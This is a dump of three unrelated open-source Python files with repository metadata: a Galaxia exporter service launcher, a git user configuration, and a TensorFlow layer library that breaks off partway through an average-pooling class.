WiproOpenSourcePractice/galaxia | 8,057,358,655,775 | 2c80ca8b295f220f16a56dcdede2a4e74dc7648c | 585c80facd190a9cb4f292bf692c8b70b726b9ef | /galaxia/gcmd/exporter.py | 2f668aca2d05b8b383de1f7046ceb0d69c8f4ab2 | [
"Apache-2.0"
] | permissive | https://github.com/WiproOpenSourcePractice/galaxia | 45da9b2fbab004f7177965b56787cbc54fa53364 | baa6ea0a2192625dce2df7daddb1d983520bb7ab | refs/heads/master | "2021-01-24T14:32:50.747049" | "2019-11-12T16:17:38" | "2019-11-12T16:17:38" | 54,614,980 | 25 | 20 | null | false | "2016-06-08T03:46:56" | "2016-03-24T04:40:15" | "2016-05-20T10:31:25" | "2016-06-08T03:46:56" | 213 | 3 | 9 | 28 | Python | null | null | # Copyright 2016 - Wipro Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module start galaxia exporter service
"""
import logging
import os
import sys
from oslo_config import cfg
from galaxia.common import service
from galaxia.common.rpc import broker
from galaxia.gexporter.controller import controller
# Register options for the galaxia exporter service
API_SERVICE_OPTS = [
cfg.StrOpt('rabbitmq_host',
default='localhost',
help='The host for the rabbitmq server'),
cfg.IntOpt('rabbitmq_port',
default='5672',
help='The port for the rabbitmq server'),
cfg.StrOpt('topic',
default='test',
help='The topic'),
cfg.StrOpt('rabbitmq_username',
default='guest',
help='The username for the rabbitmq server'),
]
log = logging.getLogger(__name__)
def main():
service.prepare_service("gexporter", sys.argv)
CONF = cfg.CONF
opt_group = cfg.OptGroup(name='gexporter', title='Options for the\
exporter service')
CONF.register_group(opt_group)
CONF.register_opts(API_SERVICE_OPTS, opt_group)
CONF.set_override('topic', CONF.gexporter.topic, opt_group)
CONF.set_override('rabbitmq_host', CONF.gexporter.rabbitmq_host, opt_group)
CONF.set_override('rabbitmq_port', CONF.gexporter.rabbitmq_port, opt_group)
CONF.set_override('rabbitmq_username', CONF.gexporter.rabbitmq_username,
opt_group)
endpoints = [
controller.Controller(),
]
log.info('Starting exporter service in PID %s' % os.getpid())
rpc_server = broker.Broker(CONF.gexporter.topic,
CONF.gexporter.rabbitmq_host,
endpoints)
print 'Galaxia Exporter service started in PID %s' % os.getpid()
rpc_server.serve()
| UTF-8 | Python | false | false | 2,416 | py | 80 | exporter.py | 45 | 0.653974 | 0.649007 | 0 | 72 | 32.555556 | 79 |
williamfzc/GitUserSwitch | 15,333,033,260,091 | dd948760ff72c770d484d6527c25ce40848d4ae7 | 16a5180db70f2ffeea6808ff28049020b147cf45 | /git_conf.py | 08153a320befbb789e214ae4a4562c0e32521e38 | [
"MIT"
] | permissive | https://github.com/williamfzc/GitUserSwitch | cbce7fd7bbfbbe7353afb04b3ec743c73fbec52a | 60482ff58dc8eae1fb4de358b25e044dc4c1f4f9 | refs/heads/master | "2021-09-01T13:37:32.442459" | "2017-12-27T08:30:57" | "2017-12-27T08:30:57" | 115,414,955 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # CONF OF GIT USER
GIT_DICT = {
'TP_LINK': {
'username': 'Feng Zhangchi',
'email': '123456789@qq.com'
},
'GITHUB': {
'username': 'williamfzc',
'email': '246@qq.com'
},
'SOMETHING_ELSE': {
'username': 'abc',
'email': '135@qq.com'
}
}
# URL IN GITHUB
EASY_TK_URL = 'https://github.com/williamfzc/easy_tk.git'
| UTF-8 | Python | false | false | 383 | py | 3 | git_conf.py | 2 | 0.501305 | 0.462141 | 0 | 20 | 18.1 | 57 |
Xue-zhen-zhen/Protein-subcellular-location | 7,361,573,987,872 | 3eb0bcbd3c2d662e052e571b5e98e98eff877540 | 744deb9925bc75427dbf65c9defa9120c849ca6e | /code/part3/GapNet-PL/tensorflow_models/TeLL/layers.py | f957be95628022b0fcbdb7d2482c51a83ece2e8b | [
"BSD-2-Clause"
] | permissive | https://github.com/Xue-zhen-zhen/Protein-subcellular-location | f4dfc94edebc2e3bf3c215d02bfe9e4708a00798 | 401eb93d311cea9a115253cc2aefbb4b9ffe30e9 | refs/heads/master | "2021-08-18T16:08:54.838031" | "2021-05-28T13:49:47" | "2021-05-28T13:49:47" | 253,808,243 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
© Michael Widrich, Markus Hofmarcher, 2017
Different classes and utility functions for stack-able network layers
See architectures/sample_architectures.py for some usage examples
"""
import numbers
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.layers import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
# ------------------------------------------------------------------------------------------------------------------
# Imports
# ------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------
# Functions
# ------------------------------------------------------------------------------------------------------------------
def tof(i, shape):
    """Resolve `i` to a tensor: call it with `shape` when it is an initializer
    function, otherwise pass it through unchanged.

    Parameters
    -------
    i : tensor or function
        Tensor, or a function that produces a tensor when called with `shape`
    shape : list or tuple
        Shape handed to the initializer function if `i` is callable

    Returns
    -------
    : tensor
        `i` itself, or the result of `i(shape)`
    """
    return i(shape) if callable(i) else i
def tofov(i, shape=None, var_params=None):
    """Resolve `i` to a tf.Variable: tensors and initializer functions get
    wrapped in a new tf.Variable, existing variables pass through untouched.

    Parameters
    -------
    i : tensor or function or tf.Variable
        Tensor or initializer function or already-constructed tf.Variable
    shape : list or tuple or None
        Shape used when `i` is an initializer function
    var_params : dict or None
        Extra keyword arguments for the tf.Variable constructor,
        e.g. dict(trainable=True); defaults to an empty dict

    Returns
    -------
    : tf.Variable
        `i` as a tf.Variable
    """
    if isinstance(i, tf.Variable):
        # Already a variable -> nothing to wrap
        return i
    # Turn initializer functions into concrete tensors first
    tensor = tof(i, shape)
    # Then promote the tensor to a (by default learnable) tf.Variable
    kwargs = dict() if var_params is None else var_params
    return tf.Variable(tensor, **kwargs)
def dot_product(tensor_nd, tensor_2d):
    """Broadcastable version of tensorflow dot product between tensor_nd and tensor_2d

    Parameters
    -------
    tensor_nd : tensor
        Tensor with 1, 2 or more dimensions; Dot product will be performed on last dimension and broadcasted over other
        dimensions
    tensor_2d : tensor
        Tensor with 1 or 2 dimensions;

    Returns
    -------
    : tensor
        Tensor for dot product result
    """
    # Get static shapes and replace unknown dimensions (None) with -1
    shape_nd = tensor_nd.get_shape().as_list()
    shape_nd = [s if isinstance(s, int) else -1 for s in shape_nd]
    shape_2d = tensor_2d.get_shape().as_list()
    if len(shape_2d) > 2:
        raise ValueError("tensor_2d must be a 1D or 2D tensor")
    if len(shape_2d) == 1:
        # Promote a 1D tensor_2d to a (1, n) matrix so tf.matmul applies
        tensor_2d = tf.expand_dims(tensor_2d, 0)
    # BUGFIX: the previous code attempted `shape_nd = tf.expand_dims(shape_nd, 0)`
    # for 1D inputs, which turned the Python shape *list* into a symbolic tensor
    # and broke the len() checks below; 1D tensor_nd is correctly handled by the
    # final else-branch, so that statement was removed.
    if len(shape_nd) > 2:
        # collapse axes except for ones to multiply and perform matmul
        dot_prod = tf.matmul(tf.reshape(tensor_nd, [-1, shape_nd[-1]]), tensor_2d)
        # reshape to correct dimensions
        dot_prod = tf.reshape(dot_prod, shape_nd[:-1] + shape_2d[-1:])
    elif len(shape_nd) == 2:
        dot_prod = tf.matmul(tensor_nd, tensor_2d)
    else:
        # 1D input: add a leading dimension of size 1 before matmul
        dot_prod = tf.matmul(tf.expand_dims(tensor_nd, 0), tensor_2d)
    return dot_prod
def conv2d(x, W, strides=(1, 1, 1, 1), padding='SAME', dilation_rate=(1, 1), name='conv2d'):
    """Broadcastable version of tensorflow 2D convolution with weight mask, striding, zero-padding, and dilation

    For dilation the tf.nn.convolution function is used. Otherwise the computation will default to the (cudnn-
    supported) tf.nn.conv2d function.

    Parameters
    -------
    x : tensor
        Input tensor to be convoluted with weight mask; Shape can be [samples, x_dim, y_dim, features] or
        [samples, timesteps, x_dim, y_dim, features]; Convolution is performed over last 3 dimensions;
    W : tensor
        Kernel to perform convolution with; Shape: [x_dim, y_dim, input_features, output_features]
    strides : tuple of int
        Striding per input dimension (see tensorflow convolution for further details)
    padding : str or tuple of int
        Padding method for image edges (see tensorflow convolution for further details); If specified as
        tuple or list of integer tf.pad is used to symmetrically zero-pad the x and y dimensions of the input.
        Furthermore supports TensorFlow paddings "VALID" and "SAME" in addition to "ZEROPAD" which symmetrically
        zero-pads the input so output-size = input-size / stride (taking into account strides and dilation;
        comparable to Caffe and Theano).
    dilation_rate : tuple of int
        Defaults to (1, 1) (i.e. normal 2D convolution). Use list of integers to specify multiple dilation rates;
        only for spatial dimensions -> len(dilation_rate) must be 2;
    name : str
        Name used for the tensorflow variable scope of this operation

    Returns
    -------
    : tensor
        Tensor for convolution result
    """
    # Static shapes; unknown dimensions (None) are encoded as -1
    x_shape = x.get_shape().as_list()
    x_shape = [s if isinstance(s, int) else -1 for s in x_shape]
    W_shape = W.get_shape().as_list()
    padding_x = None
    padding_y = None
    if padding == "ZEROPAD":
        # Derive symmetric padding so that output-size = input-size / stride
        if len(x_shape) == 5:
            # input with time dimension: [samples, timesteps, x, y, features]
            s = strides[1:3]
            i = (int(x_shape[2] / s[0]), int(x_shape[3] / s[1]))
        elif len(x_shape) == 4:
            # input without time dimension: [samples, x, y, features]
            s = strides[1:3]
            i = (int(x_shape[1] / s[0]), int(x_shape[2] / s[1]))
        else:
            raise ValueError("invalid input shape")
        # --
        kernel_x = W_shape[0]
        kernel_y = W_shape[1]
        # per-side padding in x and y, accounting for stride and dilation
        padding_x = int(np.ceil((i[0] - s[0] - i[0] + kernel_x + (kernel_x - 1) * (dilation_rate[0] - 1)) / (s[0] * 2)))
        padding_y = int(np.ceil((i[1] - s[1] - i[1] + kernel_y + (kernel_y - 1) * (dilation_rate[1] - 1)) / (s[1] * 2)))
    elif (isinstance(padding, list) or isinstance(padding, tuple)) and len(padding) == 2:
        # explicit symmetric padding given as (pad_x, pad_y)
        padding_x = padding[0]
        padding_y = padding[1]
    if padding_x is not None and padding_y is not None:
        # build a tf.pad specification matching the input rank
        if len(x_shape) == 5:
            pad = [[0, 0], [0, 0], [padding_x, padding_x], [padding_y, padding_y], [0, 0]]
        elif len(x_shape) == 4:
            pad = [[0, 0], [padding_x, padding_x], [padding_y, padding_y], [0, 0]]
        # pad input with zeros
        x = tf.pad(x, pad, "CONSTANT")
        # set padding method for convolutions to valid to not add additional padding
        padding = "VALID"
    elif padding not in ("SAME", "VALID"):
        raise ValueError("unsupported padding type")
    if dilation_rate == (1, 1):
        # no dilation -> use the (cudnn-supported) tf.nn.conv2d
        def conv_fct(inp):
            return tf.nn.conv2d(input=inp, filter=W, padding=padding, strides=strides, name=name)
    else:
        # dilation requires tf.nn.convolution; striding then only makes sense spatially
        if (strides[0] != 1) or (strides[-1] != 1):
            raise AttributeError("Striding in combination with dilation is only possible along the spatial dimensions,"
                                 "i.e. strides[0] and strides[-1] have to be 1.")
        def conv_fct(inp):
            return tf.nn.convolution(input=inp, filter=W, dilation_rate=dilation_rate,
                                     padding=padding, strides=strides[1:3], name=name)
    # Flatten matrix in first dimensions if necessary (join samples and sequence positions)
    with tf.variable_scope(name):
        if len(x_shape) > 4:
            # 5D input: merge samples and timesteps, convolve, then restore the time axis
            x_shape = [s if isinstance(s, int) else -1 for s in x.get_shape().as_list()]
            if x_shape[0] == -1 or x_shape[1] == -1:
                # unknown batch or sequence length -> let reshape infer the merged dim
                x_flat = tf.reshape(x, [-1] + x_shape[2:])
            else:
                x_flat = tf.reshape(x, [x_shape[0] * x_shape[1]] + x_shape[2:])
            conv = conv_fct(x_flat)
            conv = tf.reshape(conv, x_shape[:2] + conv.get_shape().as_list()[1:])
        else:
            conv = conv_fct(x)
    return conv
def avgpool2D(x, ksize, strides, padding, data_format):
    """Broadcastable version of tensorflow avg_pool

    Parameters
    -------
    x : tensor
        Input tensor to be pooled; Shape can be [samples, x_dim, y_dim, features] or
        [samples, timesteps, x_dim, y_dim, features]; Pooling is performed over last 3 dimensions;
    ksize : tuple or list of int
        Pooling window size per dimension (see tf.nn.avg_pool)
    strides : tuple or list of int
        Striding per dimension (see tf.nn.avg_pool)
    padding : str
        Padding method, "SAME" or "VALID" (see tf.nn.avg_pool)
    data_format : str
        Data format of x, e.g. "NHWC" (see tf.nn.avg_pool)

    Returns
    -------
    : tensor
        Tensor for avgpooling result
    """
    # Static shape; unknown dimensions (None) are encoded as -1
    x_shape = x.get_shape().as_list()
    x_shape = [s if isinstance(s, int) else -1 for s in x_shape]
    # Flatten matrix in first dimensions if necessary (join samples and sequence positions)
    if len(x_shape) > 4:
        # CONSISTENCY FIX: also treat an unknown sequence length (x_shape[1] == -1)
        # as "let reshape infer the merged dimension", matching conv2d; previously
        # a known batch with unknown timesteps produced an invalid negative dim.
        if x_shape[0] == -1 or x_shape[1] == -1:
            x_flat = tf.reshape(x, [-1] + x_shape[2:])
        else:
            x_flat = tf.reshape(x, [x_shape[0] * x_shape[1]] + x_shape[2:])
        avgpool = tf.nn.avg_pool(x_flat, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
        # Restore the [samples, timesteps, ...] leading dimensions
        avgpool = tf.reshape(avgpool, x_shape[:2] + avgpool.get_shape().as_list()[1:])
    else:
        avgpool = tf.nn.avg_pool(x, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
    return avgpool
def maxpool2D(x, ksize, strides, padding, data_format):
    """Broadcastable version of tensorflow max_pool

    Parameters
    -------
    x : tensor
        Input tensor to be pooled; Shape can be [samples, x_dim, y_dim, features] or
        [samples, timesteps, x_dim, y_dim, features]; Pooling is performed over last 3 dimensions;
    ksize : tuple or list of int
        Pooling window size per dimension (see tf.nn.max_pool)
    strides : tuple or list of int
        Striding per dimension (see tf.nn.max_pool)
    padding : str
        Padding method, "SAME" or "VALID" (see tf.nn.max_pool)
    data_format : str
        Data format of x, e.g. "NHWC" (see tf.nn.max_pool)

    Returns
    -------
    : tensor
        Tensor for maxpooling result
    """
    # Static shape; unknown dimensions (None) are encoded as -1
    x_shape = x.get_shape().as_list()
    x_shape = [s if isinstance(s, int) else -1 for s in x_shape]
    # Flatten matrix in first dimensions if necessary (join samples and sequence positions)
    if len(x_shape) > 4:
        # CONSISTENCY FIX: also treat an unknown sequence length (x_shape[1] == -1)
        # as "let reshape infer the merged dimension", matching conv2d; previously
        # a known batch with unknown timesteps produced an invalid negative dim.
        if x_shape[0] == -1 or x_shape[1] == -1:
            x_flat = tf.reshape(x, [-1] + x_shape[2:])
        else:
            x_flat = tf.reshape(x, [x_shape[0] * x_shape[1]] + x_shape[2:])
        maxpool = tf.nn.max_pool(x_flat, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
        # Restore the [samples, timesteps, ...] leading dimensions
        maxpool = tf.reshape(maxpool, x_shape[:2] + maxpool.get_shape().as_list()[1:])
    else:
        maxpool = tf.nn.max_pool(x, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
    return maxpool
def get_input(incoming):
    """Resolve `incoming` (Layer instance or plain tensor) to a fetch function
    plus the static input shape.

    Layer-like objects are queried through get_output()/get_output_shape();
    anything else is treated as a tensor, wrapped in a lambda, and its shape
    read via get_shape() with unknown dimensions replaced by -1.

    Returns
    -------
    : callable
        Function yielding the input tensor when called
    : list
        Shape of input tensor
    """
    try:
        # Layer-like object: hand back its accessor method and shape directly
        fetch_output = incoming.get_output
        output_shape = incoming.get_output_shape()
    except AttributeError:
        # Plain tensor/placeholder: wrap it and normalize unknown dims to -1
        fetch_output = lambda **kwargs: incoming
        output_shape = [d if isinstance(d, int) else -1 for d in incoming.get_shape().as_list()]
    return fetch_output, output_shape
def dropout_selu(x, rate, alpha=-1.7580993408473766, fixedPointMean=0.0, fixedPointVar=1.0,
                 noise_shape=None, seed=None, name=None, training=False):
    """Dropout to a value with rescaling.

    Alpha-dropout variant: dropped units are set to `alpha` (instead of 0) and
    the result is affinely rescaled (ret = a * ret + b) so that mean and
    variance stay at (fixedPointMean, fixedPointVar); this matches the
    alpha-dropout formulation used with SELU activations. Dropout is only
    applied when `training` is truthy; otherwise the input passes through
    unchanged (identity).
    """
    def dropout_selu_impl(x, rate, alpha, noise_shape, seed, name):
        # rate is the drop probability; keep_prob is its complement
        keep_prob = 1.0 - rate
        x = ops.convert_to_tensor(x, name="x")
        if isinstance(keep_prob, numbers.Real) and not 0 < keep_prob <= 1:
            raise ValueError("keep_prob must be a scalar tensor or a float in the "
                             "range (0, 1], got %g" % keep_prob)
        keep_prob = ops.convert_to_tensor(keep_prob, dtype=x.dtype, name="keep_prob")
        keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
        alpha = ops.convert_to_tensor(alpha, dtype=x.dtype, name="alpha")
        keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
        # keep_prob == 1 means no dropout at all -> short-circuit to identity
        if tensor_util.constant_value(keep_prob) == 1:
            return x
        noise_shape = noise_shape if noise_shape is not None else array_ops.shape(x)
        # binary_tensor is 1 with probability keep_prob, else 0
        # (floor of keep_prob + U[0,1) is the standard dropout mask trick)
        random_tensor = keep_prob
        random_tensor += random_ops.random_uniform(noise_shape, seed=seed, dtype=x.dtype)
        binary_tensor = math_ops.floor(random_tensor)
        # kept units retain x; dropped units are set to alpha (not zero)
        ret = x * binary_tensor + alpha * (1 - binary_tensor)
        # affine correction (a, b) restoring the fixed-point mean/variance
        a = tf.sqrt(fixedPointVar / (keep_prob * ((1 - keep_prob) * tf.pow(alpha - fixedPointMean, 2) + fixedPointVar)))
        b = fixedPointMean - a * (keep_prob * fixedPointMean + (1 - keep_prob) * alpha)
        ret = a * ret + b
        ret.set_shape(x.get_shape())
        return ret
    with ops.name_scope(name, "dropout", [x]) as name:
        # smart_cond resolves `training` at graph-construction time when it is
        # a Python bool, otherwise builds a tf.cond
        return utils.smart_cond(training,
                                lambda: dropout_selu_impl(x, rate, alpha, noise_shape, seed, name),
                                lambda: array_ops.identity(x))
# ------------------------------------------------------------------------------------------------------------------
# Classes
# ------------------------------------------------------------------------------------------------------------------
class Layer(object):
    """Base template that every network layer derives from.

    Attributes
    -------
    .layer_scope : variable scope or None
        Scope of the layer; populated by subclasses
    .out : tensor or None
        Current output of the layer (does not trigger computation)
    """
    def __init__(self):
        # Subclasses fill these in; the base class only declares them
        self.layer_scope = None
        self.out = None
    def get_output(self, **kwargs):
        """Calculate and return output of layer"""
        return self.out
    def get_output_shape(self):
        """Return shape of output (preferably without calculating the output)"""
        return []
class DropoutLayer(Layer):
    def __init__(self, incoming, prob, noise_shape=None, selu_dropout: bool = False, training: bool = True,
                 name='DropoutLayer'):
        """ Dropout layer using tensorflow dropout

        Parameters
        -------
        incoming : layer, tensorflow tensor, or placeholder
            Incoming layer
        prob : float or False
            Probability to drop out an element; if False, dropout is disabled and the input is passed through
        noise_shape : list or None
            Taken from tensorflow documentation: By default, each element is kept or dropped independently. If
            noise_shape is specified, it must be broadcastable to the shape of x, and only dimensions with
            noise_shape[i] == shape(x)[i] will make independent decisions. For example, if shape(x) = [k, l, m, n] and
            noise_shape = [k, 1, 1, n], each batch and channel component will be kept independently and each row and
            column will be kept or not kept together.
            If None: drop out last dimension of input tensor consistently (i.e. drop out features);
        selu_dropout : bool
            True: use dropout_selu (alpha-dropout for SELU networks); False: use standard tf.nn.dropout;
        training : bool
            Only used with selu_dropout; if False, dropout is bypassed (identity) at evaluation time;

        Returns
        -------
        """
        super(DropoutLayer, self).__init__()
        with tf.variable_scope(name) as self.layer_scope:
            self.incoming, self.incoming_shape = get_input(incoming)

            if noise_shape is None:
                # default: drop whole feature channels consistently over all other dims
                noise_shape = np.append(np.ones(len(self.incoming_shape) - 1, dtype=np.int32),
                                        [self.incoming_shape[-1]])
            # NOTE: a single assignment suffices here (the previous version
            # redundantly assigned self.noise_shape twice)
            self.prob = prob
            self.noise_shape = noise_shape
            self.out = None
            self.name = name
            self.selu_dropout = selu_dropout
            self.training = training

    def get_output_shape(self):
        """Return shape of output (same as input shape; dropout is elementwise)"""
        return self.incoming_shape

    def get_output(self, prev_layers=None, **kwargs):
        """Calculate and return output of layer

        Parameters
        -------
        prev_layers : list of Layer or None
            List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
            shall not be computed again)
        """
        if prev_layers is None:
            prev_layers = list()
        if self not in prev_layers:
            prev_layers += [self]
            incoming = self.incoming(prev_layers=prev_layers, **kwargs)
            with tf.variable_scope(self.layer_scope):
                if self.prob is not False:
                    if self.selu_dropout:
                        # alpha-dropout that preserves the SELU fixed point
                        self.out = dropout_selu(incoming, rate=self.prob, noise_shape=self.noise_shape,
                                                training=self.training)
                    else:
                        # tf.nn.dropout expects a keep probability, not a drop rate
                        self.out = tf.nn.dropout(incoming, keep_prob=1. - self.prob, noise_shape=self.noise_shape)
                else:
                    # dropout disabled -> identity
                    self.out = incoming
        return self.out
class DenseLayer(Layer):
    def __init__(self, incoming, n_units, flatten_input=False, W=tf.zeros, b=tf.zeros, a=tf.sigmoid, name='DenseLayer'):
        """ Dense layer, flexible enough to broadcast over time series

        Parameters
        -------
        incoming : layer, tensorflow tensor, or placeholder
            Input of shape (samples, sequence_positions, features) or (samples, features) or (samples, ..., features);
        n_units : int
            Number of dense layer units
        flatten_input : bool
            True: flatten all inputs (samples[, ...], features) to shape (samples, -1); i.e. fully connect to everything
            per sample
            False: flatten all inputs (samples[, sequence_positions, ...], features) to shape
            (samples, sequence_positions, -1); i.e. fully connect to everything per sample or sequence position;
            NOTE(review): 4D inputs are flattened per sample even when flatten_input=False (see the elif chain below);
        W : initializer or tensor or tf.Variable
            Weights W either as initializer or tensor or tf.Variable; Will be used as learnable tf.Variable in any case;
        b : initializer or tensor or tf.Variable or None
            Biases b either as initializer or tensor or tf.Variable; Will be used as learnable tf.Variable in any case;
            No bias will be applied if b=None;
        a : function
            Activation function
        name : string
            Name of individual layer; Used as tensorflow scope;

        Returns
        -------
        """
        super(DenseLayer, self).__init__()
        with tf.variable_scope(name) as self.layer_scope:
            self.incoming, self.incoming_shape = get_input(incoming)
            # Determine the (possibly flattened) shape the input will be reshaped to:
            # >2D with flatten_input, or 4D inputs -> flatten everything per sample;
            # >=5D inputs -> flatten everything per sample and sequence position
            if (len(self.incoming_shape) > 2) and flatten_input:
                incoming_shape = [self.incoming_shape[0], np.prod(self.incoming_shape[1:])]
            elif len(self.incoming_shape) == 4:
                incoming_shape = [self.incoming_shape[0], np.prod(self.incoming_shape[1:])]
            elif len(self.incoming_shape) >= 5:
                incoming_shape = [self.incoming_shape[0], self.incoming_shape[1], np.prod(self.incoming_shape[2:])]
            else:
                incoming_shape = self.incoming_shape
            # Set init for W (shape: [n_input_features, n_units])
            W = tofov(W, shape=[incoming_shape[-1], n_units], var_params=dict(name='W_dense'))
            # Set init for b
            if b is not None:
                b = tofov(b, [n_units], var_params=dict(name='b_dense'))
            self.a = a
            self.b = b
            self.W = W
            self.n_units = n_units
            self.flatten_input = flatten_input
            # NOTE: self.incoming_shape is overwritten with the flattened shape here;
            # it is later used both as reshape target and for get_output_shape()
            self.incoming_shape = incoming_shape
            self.out = None
            self.name = name

    def get_output_shape(self):
        """Return shape of output: (flattened) input shape with the feature dim replaced by n_units"""
        return [s if isinstance(s, int) and s >= 0 else -1 for s in self.incoming_shape[:-1]] + [self.n_units]

    def get_output(self, prev_layers=None, **kwargs):
        """Calculate and return output of layer

        Parameters
        -------
        prev_layers : list of Layer or None
            List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
            shall not be computed again)
        """
        if prev_layers is None:
            prev_layers = list()
        if self not in prev_layers:
            prev_layers += [self]
            incoming = self.incoming(prev_layers=prev_layers, **kwargs)
            with tf.variable_scope(self.layer_scope):
                if (len(incoming.shape) > 2 and self.flatten_input) or (len(incoming.shape) > 3):
                    # Flatten all but first dimension (e.g. flat seq_pos and features)
                    X = tf.reshape(incoming, self.incoming_shape)
                else:
                    X = incoming
                # dot_product broadcasts the matmul over leading dimensions
                net = dot_product(X, self.W)
                if self.b is not None:
                    net += self.b
                self.out = self.a(net)
        return self.out

    def get_weights(self):
        """Return list with all layer weights"""
        return [self.W]

    def get_biases(self):
        """Return list with all layer biases"""
        if self.b is None:
            return []
        else:
            return [self.b]
class ConvLayer(Layer):
def __init__(self, incoming, W=None, b=tf.zeros, ksize: int = None, num_outputs: int = None,
weight_initializer=None, a=tf.nn.elu, strides=(1, 1, 1, 1), padding='ZEROPAD', dilation_rate=(1, 1),
name='ConvLayer'):
""" Convolutional layer, flexible enough to broadcast over timeseries
Parameters
-------
incoming : layer, tensorflow tensor, or placeholder
Input of shape (samples, sequence_positions, array_x, array_y, features) or
(samples, array_x, array_y, features);
W : tensorflow tensor or tf.Variable
Initial value for weight kernel of shape (kernel_x, kernel_y, n_input_channels, n_output_channels)
b : tensorflow initializer or tensor or tf.Variable or None
Initial values or initializers for bias; None if no bias should be applied;
ksize : int
Kernel size; only used in conjunction with num_outputs and weight_initializer
num_outputs : int
Number of output feature maps; only used in conjunction with ksize and weight_initializer
weight_initializer : initializer function
Function for initialization of weight kernels; only used in conjunction with ksize and num_outputs
a : tensorflow function
Activation functions for output
strides : tuple
Striding to use (see tensorflow convolution for further details)
padding : str or tuple of int
Padding method for image edges (see tensorflow convolution for further details); If specified as
tuple or list of integer tf.pad is used to symmetrically zero-pad the x and y dimensions of the input.
Furthermore supports TensorFlow paddings "VALID" and "SAME" in addition to "ZEROPAD" which symmetrically
zero-pads the input so output-size = input-size / stride (taking into account strides and dilation;
comparable to Caffe and Theano).
dilation_rate : tuple of int or list of int
Defaults to (1, 1) (i.e. normal 2D convolution). Use list of integers to specify multiple dilation rates;
only for spatial dimensions -> len(dilation_rate) must be 2;
Returns
-------
"""
super(ConvLayer, self).__init__()
with tf.variable_scope(name) as self.layer_scope:
self.incoming, self.incoming_shape = get_input(incoming)
# Set init for W and b
if all(p is not None for p in [weight_initializer, ksize, num_outputs]):
W = tofov(weight_initializer, shape=(ksize, ksize, self.incoming_shape[-1], num_outputs),
var_params=dict(name='W_conv'))
else:
W = tofov(W, shape=None, var_params=dict(name='W_conv'))
ksize = W.get_shape()[0].value
if b is not None:
b = tofov(b, shape=W.get_shape().as_list()[-1], var_params=dict(name='b_conv'))
self.a = a
self.b = b
self.W = W
self.padding = padding
self.strides = strides
self.dilation_rate = dilation_rate
self.out = None
self.name = name
def get_output_shape(self):
"""Return shape of output"""
weights = self.W.get_shape().as_list()
input_size = np.asarray(self.incoming_shape[-3:-1])
strides = np.asarray(self.strides[-3:-1])
kernels = np.asarray(weights[0:2])
num_output = weights[-1]
dilations = np.asarray(self.dilation_rate)
if (isinstance(self.padding, list) or isinstance(self.padding, tuple)) and len(self.padding) == 2:
output_size = np.asarray(
np.ceil((input_size + 2 * np.asarray(self.padding) - kernels - (kernels - 1) * (dilations - 1)) / strides + 1),
dtype=np.int)
else:
output_size = np.asarray(
np.ceil(input_size / strides) if self.padding == "SAME" or self.padding == "ZEROPAD" else np.ceil(
(input_size - (kernels - 1) * dilations) / strides), dtype=np.int)
output_shape = self.incoming_shape[:]
output_shape[-3:-1] = output_size.tolist()
output_shape[-1] = num_output
return output_shape
    def get_output(self, prev_layers=None, **kwargs):
        """Calculate and return output of layer

        Computes the incoming layer's output first (memoizing via prev_layers so
        shared sub-graphs are only built once), then applies the convolution,
        the optional bias, and the activation function.

        Parameters
        -------
        prev_layers : list of Layer or None
            List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
            shall not be computed again)
        """
        if prev_layers is None:
            prev_layers = list()
        if self not in prev_layers:
            # Mark this layer as processed before recursing so shared layers
            # are only evaluated once; 'self.out' caches the result.
            prev_layers += [self]
            incoming = self.incoming(prev_layers=prev_layers, **kwargs)
            with tf.variable_scope(self.layer_scope):
                # Perform convolution
                conv = conv2d(incoming, self.W, strides=self.strides, padding=self.padding,
                              dilation_rate=self.dilation_rate)
                # Add bias
                if self.b is not None:
                    conv += self.b
                # Apply activation function
                self.out = self.a(conv)
        return self.out
def get_weights(self):
"""Return list with all layer weights"""
return [self.W]
def get_biases(self):
"""Return list with all layer biases"""
if self.b is None:
return []
else:
return [self.b]
class AvgPoolingLayer(Layer):
    def __init__(self, incoming, ksize=(1, 3, 3, 1), strides=(1, 1, 1, 1), padding='SAME', data_format='NHWC',
                 name='MaxPoolingLayer'):
        """Average-pooling layer, capable of broadcasting over timeseries

        see tensorflow nn.avg_pool function for further details on parameters

        Parameters
        -------
        incoming : layer, tensorflow tensor, or placeholder
            input to layer
        ksize : tuple of int
            pooling window size per input dimension
        strides : tuple of int
            striding per input dimension
        padding : str
            "SAME" or "VALID" (see tensorflow pooling docs)
        data_format : str
            "NHWC" or "NCHW"
        name : str
            tensorflow variable-scope name;
            NOTE(review): the default 'MaxPoolingLayer' looks like a copy-paste
            from MaxPoolingLayer, but it is kept unchanged so existing variable
            scopes/checkpoints remain valid
        """
        super(AvgPoolingLayer, self).__init__()
        with tf.variable_scope(name) as self.layer_scope:
            self.incoming, self.incoming_shape = get_input(incoming)
            self.ksize = ksize
            self.strides = strides
            self.padding = padding
            self.data_format = data_format
            self.out = None
            self.name = name

    def get_output_shape(self):
        """Return shape of output (spatial dims shrink per kernel/stride/padding;
        all other dims pass through unchanged)."""
        input_size = np.asarray(self.incoming_shape[-3:-1] if self.data_format == "NHWC" else self.incoming_shape[-2:])
